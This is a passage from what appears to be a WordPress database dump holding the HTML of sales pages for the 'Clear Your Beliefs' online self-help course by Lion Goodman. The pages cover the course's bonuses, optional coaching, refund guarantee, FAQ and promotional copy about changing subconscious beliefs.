<strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-24 15:59:00', '2014-06-24 20:59:00', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1060, 4194, '2014-06-24 16:00:45', '2014-06-24 21:00:45', '<div style="width: 125%; margin-left: -80px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\r\n\r\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\r\n\r\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs.  It takes some work, and it''s <em>very </em>effective.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest 